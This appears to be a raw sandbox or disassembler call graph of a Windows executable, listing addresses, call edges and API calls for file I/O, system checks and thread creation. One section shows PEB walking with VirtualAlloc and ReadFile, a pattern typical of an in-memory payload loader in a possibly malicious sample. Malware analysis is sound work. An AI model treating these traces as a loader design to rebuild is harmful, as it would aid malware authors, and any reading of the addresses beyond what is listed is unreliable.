__lseeki64_nolock 60 API calls 99671->99680 99675 108d34 __write_nolock 58 API calls 99672->99675 99673->99654 99677 108d68 __fclose_nolock 58 API calls 99674->99677 99679 10dc61 99675->99679 99678 115ebb __write_nolock 58 API calls 99676->99678 99681 10dc0d 99677->99681 99682 10dc9f 99678->99682 99683 108d68 __fclose_nolock 58 API calls 99679->99683 99680->99676 99684 108ff6 __fclose_nolock 9 API calls 99681->99684 99685 10dff8 99682->99685 99690 109bec ____lc_codepage_func 58 API calls 99682->99690 99686 10dc68 99683->99686 99684->99698 99687 10e016 99685->99687 99688 10e38b WriteFile 99685->99688 99689 108ff6 __fclose_nolock 9 API calls 99686->99689 99691 10e13a 99687->99691 99700 10e02c 99687->99700 99692 10dfeb GetLastError 99688->99692 99697 10dfb8 99688->99697 99689->99698 99693 10dccb GetConsoleMode 99690->99693 99704 10e22f 99691->99704 99706 10e145 99691->99706 99692->99697 99693->99685 99695 10dd0a 99693->99695 99694 10e3c4 99696 108d68 __fclose_nolock 58 API calls 99694->99696 99694->99698 99695->99685 99699 10dd1a GetConsoleCP 99695->99699 99702 10e3f2 99696->99702 99697->99694 99697->99698 99703 10e118 99697->99703 99698->99669 99699->99694 99723 10dd49 99699->99723 99700->99694 99701 10e09b WriteFile 99700->99701 99701->99692 99705 10e0d8 99701->99705 99707 108d34 __write_nolock 58 API calls 99702->99707 99708 10e123 99703->99708 99709 10e3bb 99703->99709 99704->99694 99710 10e2a4 WideCharToMultiByte 99704->99710 99705->99700 99711 10e0fc 99705->99711 99706->99694 99712 10e1aa WriteFile 99706->99712 99707->99698 99714 108d68 __fclose_nolock 58 API calls 99708->99714 99715 108d47 __dosmaperr 58 API calls 99709->99715 99710->99692 99721 10e2eb 99710->99721 99711->99697 99712->99692 99713 10e1f9 99712->99713 99713->99697 99713->99706 99713->99711 99716 10e128 99714->99716 99715->99698 99719 108d34 __write_nolock 58 API calls 99716->99719 99717 10e2f3 WriteFile 99718 10e346 GetLastError 99717->99718 99717->99721 99718->99721 99719->99698 99720 103835 __write_nolock 58 API calls 99720->99723 99721->99697 99721->99704 99721->99711 99721->99717 99722 10de9f 99722->99692 99722->99697 99722->99723 99727 117cae WriteConsoleW CreateFileW __putwch_nolock 99722->99727 99728 10dec7 WriteFile 99722->99728 99723->99697 99723->99720 99723->99722 99724 11650a 60 API calls __write_nolock 99723->99724 99725 10de32 WideCharToMultiByte 99723->99725 99724->99723 99725->99697 99726 10de6d WriteFile 99725->99726 99726->99692 99726->99722 99727->99722 99728->99692 99728->99722 99729->99636 99730->99641 99731->99640 99732->99652 99733->99654 99734->99641 99735->99640 99736->99648 99737->99641 99761 10d703 99738->99761 99740 110d91 99774 10d67d 59 API calls 2 library calls 99740->99774 99741 110d3b 99741->99740 99743 110d6f 99741->99743 99744 10d703 __close_nolock 58 API calls 99741->99744 99743->99740 99745 10d703 __close_nolock 58 API calls 99743->99745 99747 110d66 99744->99747 99748 110d7b FindCloseChangeNotification 99745->99748 99746 110d99 99749 110dbb 99746->99749 99775 108d47 58 API calls 3 library calls 99746->99775 99750 10d703 __close_nolock 58 API calls 99747->99750 99748->99740 99751 110d87 GetLastError 99748->99751 99749->99624 99750->99743 99751->99740 99753->99606 99754->99621 99755->99612 99756->99624 99757->99621 99758->99612 99759->99617 99760->99621 99762 10d723 99761->99762 99763 10d70e 99761->99763 99765 108d34 __write_nolock 58 API calls 99762->99765 99767 10d748 99762->99767 99764 108d34 __write_nolock 58 API calls 99763->99764 99766 10d713 99764->99766 99768 10d752 99765->99768 99769 108d68 __fclose_nolock 58 API calls 99766->99769 99767->99741 99770 108d68 __fclose_nolock 58 API calls 99768->99770 99771 10d71b 99769->99771 99772 10d75a 99770->99772 99771->99741 99773 108ff6 __fclose_nolock 9 API calls 99772->99773 99773->99771 99774->99746 99775->99749 99777 1009e2 __write_nolock 99776->99777 99778 1009f1 GetLongPathNameW 99777->99778 99779 e7d2c 59 API calls 99778->99779 99780 e741d 99779->99780 99781 e716b 99780->99781 99782 e77c7 59 API calls 99781->99782 99783 e717d 99782->99783 99784 e48ae 60 API calls 99783->99784 99785 e7188 99784->99785 99786 e7193 99785->99786 99787 11ecae 99785->99787 99788 e3f84 59 API calls 99786->99788 99792 11ecc8 99787->99792 99834 e7a68 61 API calls 99787->99834 99790 e719f 99788->99790 99828 e34c2 99790->99828 99793 e71b2 Mailbox 99793->98707 99795 e4f3d 136 API calls 99794->99795 99796 e69ef 99795->99796 99797 11e45a 99796->99797 99798 e4f3d 136 API calls 99796->99798 99799 1497e5 122 API calls 99797->99799 99800 e6a03 99798->99800 99801 11e46f 99799->99801 99800->99797 99802 e6a0b 99800->99802 99803 11e490 99801->99803 99804 11e473 99801->99804 99806 e6a17 99802->99806 99807 11e47b 99802->99807 99805 100ff6 Mailbox 59 API calls 99803->99805 99808 e4faa 84 API calls 99804->99808 99825 11e4d5 Mailbox 99805->99825 99835 e6bec 99806->99835 99928 144534 90 API calls _wprintf 99807->99928 99808->99807 99812 11e489 99812->99803 99813 11e689 99814 102f95 _free 58 API calls 99813->99814 99815 11e691 99814->99815 99816 e4faa 84 API calls 99815->99816 99821 11e69a 99816->99821 99820 102f95 _free 58 API calls 99820->99821 99821->99820 99822 e4faa 84 API calls 99821->99822 99934 13fcb1 89 API calls 4 library calls 99821->99934 99822->99821 99824 e7f41 59 API calls 99824->99825 99825->99813 99825->99821 99825->99824 99929 13fc4d 59 API calls 2 library calls 99825->99929 99930 13fb6e 61 API calls 2 library calls 99825->99930 99931 147621 59 API calls Mailbox 99825->99931 99932 e766f 59 API calls 2 library calls 99825->99932 99933 e74bd 59 API calls Mailbox 99825->99933 99829 e34d4 99828->99829 99833 e34f3 _memmove 99828->99833 99832 100ff6 Mailbox 59 API calls 99829->99832 99830 100ff6 Mailbox 59 API calls 99831 e350a 99830->99831 99831->99793 99832->99833 99833->99830 99834->99787 99836 11e847 99835->99836 99837 e6c15 99835->99837 100026 13fcb1 89 API calls 4 library calls 99836->100026 99940 e5906 60 API calls Mailbox 99837->99940 99840 e6c37 99941 e5956 99840->99941 99841 11e85a 100027 13fcb1 89 API calls 4 library calls 99841->100027 99845 e6c54 99847 e77c7 59 API calls 99845->99847 99846 11e876 99849 e6cc1 99846->99849 99848 e6c60 99847->99848 99954 100b9b 60 API calls __write_nolock 99848->99954 99851 e6ccf 99849->99851 99852 11e889 99849->99852 99855 e77c7 59 API calls 99851->99855 99854 e5dcf CloseHandle 99852->99854 99853 e6c6c 99856 e77c7 59 API calls 99853->99856 99858 11e895 99854->99858 99859 e6cd8 99855->99859 99857 e6c78 99856->99857 99860 e48ae 60 API calls 99857->99860 99861 e4f3d 136 API calls 99858->99861 99862 e77c7 59 API calls 99859->99862 99863 e6c86 99860->99863 99864 11e8b1 99861->99864 99865 e6ce1 99862->99865 99955 e59b0 ReadFile SetFilePointerEx 99863->99955 99867 11e8da 99864->99867 99870 1497e5 122 API calls 99864->99870 99964 e46f9 99865->99964 100028 13fcb1 89 API calls 4 library calls 99867->100028 99869 e6cb2 99956 e5c4e 99869->99956 99875 11e8cd 99870->99875 99871 e6cf8 99876 e7c8e 59 API calls 99871->99876 99873 11e8f1 99906 e6e6c Mailbox 99873->99906 99877 11e8d5 99875->99877 99878 11e8f6 99875->99878 99879 e6d09 SetCurrentDirectoryW 99876->99879 99881 e4faa 84 API calls 99877->99881 99880 e4faa 84 API calls 99878->99880 99884 e6d1c Mailbox 99879->99884 99882 11e8fb 99880->99882 99881->99867 99883 100ff6 Mailbox 59 API calls 99882->99883 99890 11e92f 99883->99890 99887 e3bcd 99887->98566 99887->98575 100029 e766f 59 API calls 2 library calls 99890->100029 99895 11eb69 100035 147581 59 API calls Mailbox 99895->100035 99899 11eb8b 100036 14f835 59 API calls 2 library calls 99899->100036 99902 11eb98 99904 102f95 _free 58 API calls 99902->99904 99904->99906 99935 e5934 99906->99935 99918 e7f41 59 API calls 99925 11e978 Mailbox 99918->99925 99922 11ebbb 100037 13fcb1 89 API calls 4 library calls 99922->100037 99924 11ebd4 99926 102f95 _free 58 API calls 99924->99926 99925->99895 99925->99918 99925->99922 100030 13fc4d 59 API calls 2 library calls 99925->100030 100031 13fb6e 61 API calls 2 library calls 99925->100031 100032 147621 59 API calls Mailbox 99925->100032 100033 e766f 59 API calls 2 library calls 99925->100033 100034 e7373 59 API calls Mailbox 99925->100034 99927 11ebe7 99926->99927 99927->99906 99928->99812 99929->99825 99930->99825 99931->99825 99932->99825 99933->99825 99934->99821 99936 e5dcf CloseHandle 99935->99936 99937 e593c Mailbox 99936->99937 99938 e5dcf CloseHandle 99937->99938 99939 e594b 99938->99939 99939->99887 99940->99840 99942 e5dcf CloseHandle 99941->99942 99943 e5962 99942->99943 100040 e5df9 99943->100040 99945 e59a4 99945->99841 99945->99845 99946 e5981 99946->99945 100048 e5770 99946->100048 99948 e5993 100065 e53db SetFilePointerEx SetFilePointerEx 99948->100065 99950 e599a 99950->99945 99951 11e030 99950->99951 100066 143696 SetFilePointerEx SetFilePointerEx WriteFile 99951->100066 99953 11e060 99953->99945 99954->99853 99955->99869 99962 e5c68 99956->99962 99957 e5cef SetFilePointerEx 100079 e5dae SetFilePointerEx 99957->100079 99958 11e151 100080 e5dae SetFilePointerEx 99958->100080 99961 11e16b 99962->99957 99962->99958 99963 e5cc3 99962->99963 99963->99849 99965 e77c7 59 API calls 99964->99965 99966 e470f 99965->99966 99967 e77c7 59 API calls 99966->99967 99968 e4717 99967->99968 99969 e77c7 59 API calls 99968->99969 99970 e471f 99969->99970 99971 e77c7 59 API calls 99970->99971 99972 e4727 99971->99972 99973 e475b 99972->99973 99974 11d8fb 99972->99974 99975 e79ab 59 API calls 99973->99975 99976 e81a7 59 API calls 99974->99976 99977 e4769 99975->99977 99978 11d904 99976->99978 99979 e7e8c 59 API calls 99977->99979 99980 e7eec 59 API calls 99978->99980 99981 e4773 99979->99981 99983 e479e 99980->99983 99982 e79ab 59 API calls 99981->99982 99981->99983 99985 e4794 99982->99985 99986 e47bd 99983->99986 99997 11d924 99983->99997 100001 e47de 99983->100001 99988 e7e8c 59 API calls 99985->99988 99990 e7b52 59 API calls 99986->99990 99987 e47ef 99991 e4801 99987->99991 99994 e81a7 59 API calls 99987->99994 99988->99983 99989 11d9f4 99992 e7d2c 59 API calls 99989->99992 99993 e47c7 99990->99993 99995 e4811 99991->99995 99996 e81a7 59 API calls 99991->99996 100010 11d9b1 99992->100010 100000 e79ab 59 API calls 99993->100000 99993->100001 99994->99991 99999 e4818 99995->99999 100002 e81a7 59 API calls 99995->100002 99996->99995 99997->99989 99998 11d9dd 99997->99998 100009 11d95b 99997->100009 99998->99989 100005 11d9c8 99998->100005 100003 e81a7 59 API calls 99999->100003 100012 e481f Mailbox 99999->100012 100000->100001 100081 e79ab 100001->100081 100002->99999 100003->100012 100004 e7b52 59 API calls 100004->100010 100008 e7d2c 59 API calls 100005->100008 100006 11d9b9 100007 e7d2c 59 API calls 100006->100007 100007->100010 100008->100010 100009->100006 100013 11d9a4 100009->100013 100010->100001 100010->100004 100094 e7a84 59 API calls 2 library calls 100010->100094 100012->99871 100014 e7d2c 59 API calls 100013->100014 100014->100010 100026->99841 100027->99846 100028->99873 100029->99925 100030->99925 100031->99925 100032->99925 100033->99925 100034->99925 100035->99899 100036->99902 100037->99924 100041 11e181 100040->100041 100042 e5e12 CreateFileW 100040->100042 100043 11e187 CreateFileW 100041->100043 100045 e5e34 100041->100045 100042->100045 100044 11e1ad 100043->100044 100043->100045 100046 e5c4e 2 API calls 100044->100046 100045->99946 100047 11e1b8 100046->100047 100047->100045 100049 e578b 100048->100049 100050 11dfce 100048->100050 100051 e5c4e 2 API calls 100049->100051 100064 e581a 100049->100064 100050->100064 100073 e5e3f 100050->100073 100052 e57ad 100051->100052 100054 e538e 59 API calls 100052->100054 100055 e57b7 100054->100055 100055->100050 100056 e57c4 100055->100056 100057 100ff6 Mailbox 59 API calls 100056->100057 100058 e57cf 100057->100058 100059 e538e 59 API calls 100058->100059 100060 e57da 100059->100060 100067 e5d20 100060->100067 100062 e5807 100063 e5c4e 2 API calls 100062->100063 100063->100064 100064->99948 100065->99950 100066->99953 100068 e5d93 100067->100068 100071 e5d2e 100067->100071 100078 e5dae SetFilePointerEx 100068->100078 100070 e5d56 100070->100062 100071->100070 100072 e5d66 ReadFile 100071->100072 100072->100070 100072->100071 100074 e5c4e 2 API calls 100073->100074 100075 e5e60 100074->100075 100076 e5c4e 2 API calls 100075->100076 100077 e5e74 100076->100077 100077->100064 100078->100071 100079->99963 100080->99961 100082 e79ba 100081->100082 100083 e7a17 100081->100083 100082->100083 100084 e79c5 100082->100084 100085 e7e8c 59 API calls 100083->100085 100086 11ef32 100084->100086 100087 e79e0 100084->100087 100091 e79e8 _memmove 100085->100091 100088 e8189 59 API calls 100086->100088 100095 e8087 59 API calls Mailbox 100087->100095 100090 11ef3c 100088->100090 100092 100ff6 Mailbox 59 API calls 100090->100092 100091->99987 100093 11ef5c 100092->100093 100094->100010 100095->100091 100097 e6ef5 100096->100097 100101 e7009 100096->100101 100098 100ff6 Mailbox 59 API calls 100097->100098 100097->100101 100100 e6f1c 100098->100100 100099 100ff6 Mailbox 59 API calls 100105 e6f91 100099->100105 100100->100099 100101->98713 100105->100101 100109 e63a0 100105->100109 100135 e74bd 59 API calls Mailbox 100105->100135 100136 136ac9 59 API calls Mailbox 100105->100136 100137 e766f 59 API calls 2 library calls 100105->100137 100107->98715 100108->98717 100138 e7b76 100109->100138 100111 e65ca 100116 e63c5 100116->100111 100117 11e41f 100116->100117 100118 11e3eb _memmove 100116->100118 100119 e766f 59 API calls 100116->100119 100124 e7eec 59 API calls 100116->100124 100126 e68f9 100116->100126 100128 11e3bb 100116->100128 100132 e7faf 59 API calls 100116->100132 100143 e60cc 60 API calls 100116->100143 100118->100117 100118->100126 100119->100116 100124->100116 100135->100105 100136->100105 100137->100105 100139 100ff6 Mailbox 59 API calls 100138->100139 100140 e7b9b 100139->100140 100141 e8189 59 API calls 100140->100141 100142 e7baa 100141->100142 100142->100116 100143->100116 100151->98731 100152->98732 100677 120226 100678 eade2 Mailbox 100677->100678 100680 120c86 100678->100680 100682 120c8f 100678->100682 100684 1200e0 VariantClear 100678->100684 100685 eb6c1 100678->100685 100691 15474d 100678->100691 100700 15e237 100678->100700 100703 14d2e6 100678->100703 100750 f2123 100678->100750 100790 e9df0 59 API calls Mailbox 100678->100790 100791 137405 59 API calls 100678->100791 100793 1366f4 100680->100793 100684->100678 100792 14a0b5 89 API calls 4 library calls 100685->100792 100692 e9997 84 API calls 100691->100692 100693 154787 100692->100693 100694 e63a0 94 API calls 100693->100694 100695 154797 100694->100695 100696 1547bc 100695->100696 100697 ea000 341 API calls 100695->100697 100699 1547c0 100696->100699 100796 e9bf8 100696->100796 100697->100696 100699->100678 100701 15cdf1 130 API calls 100700->100701 100702 15e247 100701->100702 100702->100678 100704 14d305 100703->100704 100705 14d310 100703->100705 100809 e9c9c 59 API calls 100704->100809 100708 e77c7 59 API calls 100705->100708 100740 14d3ea Mailbox 100705->100740 100707 100ff6 Mailbox 59 API calls 100709 14d433 100707->100709 100710 14d334 100708->100710 100711 14d43f 100709->100711 100812 e5906 60 API calls Mailbox 100709->100812 100712 e77c7 59 API calls 100710->100712 100714 e9997 84 API calls 100711->100714 100715 14d33d 100712->100715 100716 14d457 100714->100716 100717 e9997 84 API calls 100715->100717 100718 e5956 67 API calls 100716->100718 100719 14d349 100717->100719 100720 14d466 100718->100720 100721 e46f9 59 API calls 100719->100721 100722 14d49e 100720->100722 100723 14d46a GetLastError 100720->100723 100724 14d35e 100721->100724 100727 14d500 100722->100727 100728 14d4c9 100722->100728 100725 14d483 100723->100725 100726 e7c8e 59 API calls 100724->100726 100731 14d3f3 Mailbox 100725->100731 100813 e5a1a CloseHandle 100725->100813 100729 14d391 100726->100729 100733 100ff6 Mailbox 59 API calls 100727->100733 100730 100ff6 Mailbox 59 API calls 100728->100730 100732 14d3e3 100729->100732 100738 143e73 3 API calls 100729->100738 100735 14d4ce 100730->100735 100731->100678 100811 e9c9c 59 API calls 100732->100811 100734 14d505 100733->100734 100734->100731 100742 e77c7 59 API calls 100734->100742 100739 14d4df 100735->100739 100743 e77c7 59 API calls 100735->100743 100741 14d3a1 100738->100741 100814 14f835 59 API calls 2 library calls 100739->100814 100740->100707 100740->100731 100741->100732 100744 14d3a5 100741->100744 100742->100731 100743->100739 100745 e7f41 59 API calls 100744->100745 100747 14d3b2 100745->100747 100810 143c66 63 API calls Mailbox 100747->100810 100749 14d3bb Mailbox 100749->100732 100751 e9bf8 59 API calls 100750->100751 100752 f213b 100751->100752 100754 100ff6 Mailbox 59 API calls 100752->100754 100757 1269af 100752->100757 100755 f2154 100754->100755 100758 f2164 100755->100758 100830 e5906 60 API calls Mailbox 100755->100830 100756 f2189 100765 f2196 100756->100765 100835 e9c9c 59 API calls 100756->100835 100757->100756 100834 14f7df 59 API calls 100757->100834 100760 e9997 84 API calls 100758->100760 100762 f2172 100760->100762 100764 e5956 67 API calls 100762->100764 100763 1269f7 100763->100765 100766 1269ff 100763->100766 100767 f2181 100764->100767 100768 e5e3f 2 API calls 100765->100768 100836 e9c9c 59 API calls 100766->100836 100767->100756 100767->100757 100833 e5a1a CloseHandle 100767->100833 100771 f219d 100768->100771 100772 126a11 100771->100772 100773 f21b7 100771->100773 100775 100ff6 Mailbox 59 API calls 100772->100775 100774 e77c7 59 API calls 100773->100774 100776 f21bf 100774->100776 100777 126a17 100775->100777 100815 e56d2 100776->100815 100779 126a2b 100777->100779 100837 e59b0 ReadFile SetFilePointerEx 100777->100837 100783 126a2f _memmove 100779->100783 100838 14794e 59 API calls 2 library calls 100779->100838 100782 f21ce 100782->100783 100831 e9b9c 59 API calls Mailbox 100782->100831 100785 f21e2 Mailbox 100786 f221c 100785->100786 100787 e5dcf CloseHandle 100785->100787 100786->100678 100788 f2210 100787->100788 100788->100786 100832 e5a1a CloseHandle 100788->100832 100790->100678 100791->100678 100792->100680 100876 136636 100793->100876 100795 136702 100795->100682 100797 e9c08 100796->100797 100798 11fbff 100796->100798 100803 100ff6 Mailbox 59 API calls 100797->100803 100799 11fc10 100798->100799 100801 e7d2c 59 API calls 100798->100801 100800 e7eec 59 API calls 100799->100800 100802 11fc1a 100800->100802 100801->100799 100806 e9c34 100802->100806 100807 e77c7 59 API calls 100802->100807 100804 e9c1b 100803->100804 100804->100802 100805 e9c26 100804->100805 100805->100806 100808 e7f41 59 API calls 100805->100808 100806->100699 100807->100806 100808->100806 100809->100705 100810->100749 100811->100740 100812->100711 100813->100731 100814->100731 100816 e56dd 100815->100816 100817 e5702 100815->100817 100816->100817 100821 e56ec 100816->100821 100818 e7eec 59 API calls 100817->100818 100822 14349a 100818->100822 100819 1434c9 100819->100782 100841 e5c18 100821->100841 100822->100819 100839 143436 ReadFile SetFilePointerEx 100822->100839 100840 e7a84 59 API calls 2 library calls 100822->100840 100829 1435d8 Mailbox 100829->100782 100830->100758 100831->100785 100832->100786 100833->100757 100834->100757 100835->100763 100836->100771 100837->100779 100838->100783 100839->100822 100840->100822 100842 100ff6 Mailbox 59 API calls 100841->100842 100843 e5c2b 100842->100843 100844 100ff6 Mailbox 59 API calls 100843->100844 100845 e5c37 100844->100845 100846 e5632 100845->100846 100853 e5a2f 100846->100853 100848 e5674 100848->100829 100852 e793a 61 API calls Mailbox 100848->100852 100849 e5d20 2 API calls 100850 e5643 100849->100850 100850->100848 100850->100849 100860 e5bda 100850->100860 100852->100829 100854 11e065 100853->100854 100855 e5a40 100853->100855 100869 136443 59 API calls Mailbox 100854->100869 100855->100850 100857 11e06f 100858 100ff6 Mailbox 59 API calls 100857->100858 100859 11e07b 100858->100859 100861 e5bee 100860->100861 100862 11e117 100860->100862 100870 e5b19 100861->100870 100875 136443 59 API calls Mailbox 100862->100875 100865 e5bfa 100865->100850 100866 11e122 100867 100ff6 Mailbox 59 API calls 100866->100867 100868 11e137 _memmove 100867->100868 100869->100857 100871 e5b2a _memmove 100870->100871 100872 e5b31 100870->100872 100871->100865 100873 100ff6 Mailbox 59 API calls 100872->100873 100874 11e0a7 100872->100874 100873->100871 100874->100874 100875->100866 100877 13665e 100876->100877 100878 136641 100876->100878 100877->100795 100878->100877 100880 136621 59 API calls Mailbox 100878->100880 100880->100878 100881 e568a 100882 e5c18 59 API calls 100881->100882 100883 e569c 100882->100883 100884 e5632 61 API calls 100883->100884 100885 e56aa 100884->100885 100887 e56ba Mailbox 100885->100887 100888 e81c1 61 API calls Mailbox 100885->100888 100888->100887 100889 ef295b 100890 ef2962 100889->100890 100891 ef296a 100890->100891 100892 ef2a00 100890->100892 100896 ef2610 100891->100896 100909 ef32b0 9 API calls 100892->100909 100895 ef29e7 100910 ef0000 100896->100910 100899 ef26e0 CreateFileW 100900 ef26af 100899->100900 100903 ef26ed 100899->100903 100901 ef2709 VirtualAlloc 100900->100901 100900->100903 100907 ef2810 FindCloseChangeNotification 100900->100907 100908 ef2820 VirtualFree 100900->100908 100913 ef3520 GetPEB 100900->100913 100902 ef272a ReadFile 100901->100902 100901->100903 100902->100903 100904 ef2748 VirtualAlloc 100902->100904 100905 ef28fc VirtualFree 100903->100905 100906 ef290a 100903->100906 100904->100900 100904->100903 100905->100906 100906->100895 100907->100900 100908->100900 100909->100895 100915 ef34c0 GetPEB 100910->100915 100912 ef068b 100912->100900 100914 ef354a 100913->100914 100914->100899 100916 ef34ea 100915->100916 100916->100912 100917 ee70b 100920 ed260 100917->100920 100919 ee719 100921 ed27d 100920->100921 100950 ed4dd 100920->100950 100922 122b0a 100921->100922 100923 122abb 100921->100923 100940 ed2a4 100921->100940 100964 15a6fb 341 API calls __cinit 100922->100964 100926 122abe 100923->100926 100931 122ad9 100923->100931 100927 122aca 100926->100927 100926->100940 100962 15ad0f 341 API calls 100927->100962 100928 102f80 __cinit 67 API calls 100928->100940 100931->100950 100963 15b1b7 341 API calls 3 library calls 100931->100963 100932 122cdf 100932->100932 100933 ed6ab 100933->100919 100935 ed594 100956 e8bb2 68 API calls 100935->100956 100938 ed5a3 100938->100919 100939 122c26 100968 15aa66 89 API calls 100939->100968 100940->100928 100940->100933 100940->100935 100940->100939 100944 e8620 69 API calls 100940->100944 100940->100950 100951 ea000 341 API calls 100940->100951 100952 e81a7 59 API calls 100940->100952 100954 e88a0 68 API calls __cinit 100940->100954 100955 e86a2 68 API calls 100940->100955 100957 e859a 68 API calls 100940->100957 100958 ed0dc 341 API calls 100940->100958 100959 e9f3a 59 API calls Mailbox 100940->100959 100960 ed060 89 API calls 100940->100960 100961 ecedd 341 API calls 100940->100961 100965 e8bb2 68 API calls 100940->100965 100966 e9e9c 60 API calls Mailbox 100940->100966 100967 136d03 60 API calls 100940->100967 100944->100940 100950->100933 100969 14a0b5 89 API calls 4 library calls 100950->100969 100951->100940 100952->100940 100954->100940 100955->100940 100956->100938 100957->100940 100958->100940 100959->100940 100960->100940 100961->100940 100962->100933 100963->100950 100964->100940 100965->100940 100966->100940 100967->100940 100968->100950 100969->100932 100970 11ff06 100971 11ff10 100970->100971 101007 eac90 Mailbox _memmove 100970->101007 101069 e8e34 59 API calls Mailbox 100971->101069 100977 eb5d5 100981 e81a7 59 API calls 100977->100981 100978 100ff6 59 API calls Mailbox 100997 ea097 Mailbox 100978->100997 100990 ea1b7 100981->100990 100982 12047f 101073 14a0b5 89 API calls 4 library calls 100982->101073 100983 eb5da 101079 14a0b5 89 API calls 4 library calls 100983->101079 100984 e81a7 59 API calls 100984->100997 100985 e7f41 59 API calls 100985->101007 100988 e77c7 59 API calls 100988->100997 100989 12048e 100991 102f80 67 API calls __cinit 100991->100997 100993 137405 59 API calls 100993->100997 100994 1366f4 Mailbox 59 API calls 100994->100990 100995 120e00 101078 14a0b5 89 API calls 4 library calls 100995->101078 100997->100977 100997->100978 100997->100982 100997->100983 100997->100984 100997->100988 100997->100990 100997->100991 100997->100993 100997->100995 100999 ea6ba 100997->100999 101063 eca20 341 API calls 2 library calls 100997->101063 101064 eba60 60 API calls Mailbox 100997->101064 100998 15bf80 341 API calls 100998->101007 101077 14a0b5 89 API calls 4 library calls 100999->101077 101000 1366f4 Mailbox 59 API calls 101000->101007 101001 eb416 101068 ef803 341 API calls 101001->101068 101003 ea000 341 API calls 101003->101007 101004 120c94 101075 e9df0 59 API calls Mailbox 101004->101075 101006 120ca2 101076 14a0b5 89 API calls 4 library calls 101006->101076 101007->100985 101007->100990 101007->100997 101007->100998 101007->101000 101007->101001 101007->101003 101007->101004 101007->101006 101010 eb37c 101007->101010 101012 100ff6 59 API calls Mailbox 101007->101012 101016 eb685 101007->101016 101019 eade2 Mailbox 101007->101019 101025 15c5f4 101007->101025 101057 147be0 101007->101057 101070 137405 59 API calls 101007->101070 101071 15c4a7 85 API calls 2 library calls 101007->101071 101009 120c86 101009->100990 101009->100994 101066 e9e9c 60 API calls Mailbox 101010->101066 101012->101007 101013 eb38d 101067 e9e9c 60 API calls Mailbox 101013->101067 101074 14a0b5 89 API calls 4 library calls 101016->101074 101019->100990 101019->101009 101019->101016 101020 1200e0 VariantClear 101019->101020 101021 14d2e6 101 API calls 101019->101021 101022 15e237 130 API calls 101019->101022 101023 15474d 341 API calls 101019->101023 101024 f2123 95 API calls 101019->101024 101065 e9df0 59 API calls Mailbox 101019->101065 101072 137405 59 API calls 101019->101072 101020->101019 101021->101019 101022->101019 101023->101019 101024->101019 101026 e77c7 59 API calls 101025->101026 101027 15c608 101026->101027 101028 e77c7 59 API calls 101027->101028 101029 15c610 101028->101029 101030 e77c7 59 API calls 101029->101030 101031 15c618 101030->101031 101032 e9997 84 API calls 101031->101032 101056 15c626 101032->101056 101033 e7a84 59 API calls 101033->101056 101034 e7d2c 59 API calls 101034->101056 101035 15c80f 101036 15c83c Mailbox 101035->101036 101082 e9b9c 59 API calls Mailbox 101035->101082 101036->101007 101038 15c7f6 101039 e7e0b 59 API calls 101038->101039 101042 15c803 101039->101042 101040 15c811 101043 e7e0b 59 API calls 101040->101043 101041 e81a7 59 API calls 101041->101056 101045 e7c8e 59 API calls 101042->101045 101046 15c820 101043->101046 101044 e7faf 59 API calls 101047 15c6bd CharUpperBuffW 101044->101047 101045->101035 101048 e7c8e 59 API calls 101046->101048 101080 e859a 68 API calls 101047->101080 101048->101035 101049 e7faf 59 API calls 101051 15c77d CharUpperBuffW 101049->101051 101081 ec707 69 API calls 2 library calls 101051->101081 101053 e9997 84 API calls 101053->101056 101054 e7e0b 59 API calls 101054->101056 101055 e7c8e 59 API calls 101055->101056 101056->101033 101056->101034 101056->101035 101056->101036 101056->101038 101056->101040 101056->101041 101056->101044 101056->101049 101056->101053 101056->101054 101056->101055 101058 147bec 101057->101058 101059 100ff6 Mailbox 59 API calls 101058->101059 101060 147bfa 101059->101060 101061 147c08 101060->101061 101062 e77c7 59 API calls 101060->101062 101061->101007 101062->101061 101063->100997 101064->100997 101065->101019 101066->101013 101067->101001 101068->101016 101069->101007 101070->101007 101071->101007 101072->101019 101073->100989 101074->101009 101075->101009 101076->101009 101077->100990 101078->100983 101079->100990 101080->101056 101081->101056 101082->101036 101083 e1016 101088 e4ad2 101083->101088 101086 102f80 __cinit 67 API calls 101087 e1025 101086->101087 101089 100ff6 Mailbox 59 API calls 101088->101089 101090 e4ada 101089->101090 101091 e101b 101090->101091 101095 e4a94 101090->101095 101091->101086 101096 e4a9d 101095->101096 101097 e4aaf 101095->101097 101098 102f80 __cinit 67 API calls 101096->101098 101099 e4afe 101097->101099 101098->101097 101100 e77c7 59 API calls 101099->101100 101101 e4b16 GetVersionExW 101100->101101 101102 e7d2c 59 API calls 101101->101102 101103 e4b59 101102->101103 101104 e7e8c 59 API calls 101103->101104 101113 e4b86 101103->101113 101105 e4b7a 101104->101105 101106 e7886 59 API calls 101105->101106 101106->101113 101107 e4bf1 GetCurrentProcess IsWow64Process 101108 e4c0a 101107->101108 101110 e4c89 GetSystemInfo 101108->101110 101111 e4c20 101108->101111 101109 11dc8d 101112 e4c56 101110->101112 101123 e4c95 101111->101123 101112->101091 101113->101107 101113->101109 101116 e4c7d GetSystemInfo 101118 e4c47 101116->101118 101117 e4c32 101119 e4c95 2 API calls 101117->101119 101118->101112 101120 e4c4d FreeLibrary 101118->101120 101121 e4c3a GetNativeSystemInfo 101119->101121 101120->101112 101121->101118 101124 e4c2e 101123->101124 101125 e4c9e LoadLibraryA 101123->101125 101124->101116 101124->101117 101125->101124 101126 e4caf GetProcAddress 101125->101126 101126->101124 101127 e1066 101132 ef8cf 101127->101132 101129 e106c 101130 102f80 __cinit 67 API calls 101129->101130 101131 e1076 101130->101131 101133 ef8f0 101132->101133 101165 100143 101133->101165 101137 ef937 101138 e77c7 59 API calls 101137->101138 101139 ef941 101138->101139 101140 e77c7 59 API calls 101139->101140 101141 ef94b 101140->101141 101142 e77c7 59 API calls 101141->101142 101143 ef955 101142->101143 101144 e77c7 59 API calls 101143->101144 101145 ef993 101144->101145 101146 e77c7 59 API calls 101145->101146 101147 efa5e 101146->101147 101175 f60e7 101147->101175 101151 efa90 101152 e77c7 59 API calls 101151->101152 101153 efa9a 101152->101153 101203 fffde 101153->101203 101155 efae1 101156 efaf1 GetStdHandle 101155->101156 101157 efb3d 101156->101157 101158 1249d5 101156->101158 101159 efb45 OleInitialize 101157->101159 101158->101157 101160 1249de 101158->101160 101159->101129 101210 146dda 64 API calls Mailbox 101160->101210 101162 1249e5 101211 1474a9 CreateThread 101162->101211 101164 1249f1 CloseHandle 101164->101159 101212 10021c 101165->101212 101168 10021c 59 API calls 101169 100185 101168->101169 101170 e77c7 59 API calls 101169->101170 101171 100191 101170->101171 101172 e7d2c 59 API calls 101171->101172 101173 